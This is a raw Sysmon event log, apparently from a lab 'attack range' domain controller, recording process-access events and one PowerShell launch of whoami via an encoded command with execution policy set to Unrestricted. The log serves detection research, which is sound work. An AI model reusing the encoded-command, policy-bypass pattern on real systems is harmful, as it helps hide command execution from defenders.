08:41:58.261{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.261{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.261{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.261{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-16D6-5F84-7C00-000000007F01}49404960C:\Windows\system32\conhost.exe{5D479F2C-16D6-5F84-7F00-000000007F01}5116C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16D6-5F84-7F00-000000007F01}5116C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-16D6-5F84-7E00-000000007F01}50165108C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16D6-5F84-7F00-000000007F01}5116C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e87432ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e86954ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ba49de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7c02ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7bd8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7be3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e86954ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7bcaca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7bca279(wow64) 10341000x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.214{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.214{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.214{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.226{5D479F2C-16D6-5F84-7F00-000000007F01}5116C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D6-5F84-ACD0-040000000000}0x4d0ac0HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.152{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.152{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.120{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0sxvh2ck.o50.ps12020-10-12 08:41:58.120 10341000x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16D6-5F84-7C00-000000007F01}49404960C:\Windows\system32\conhost.exe{5D479F2C-16D6-5F84-7E00-000000007F01}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 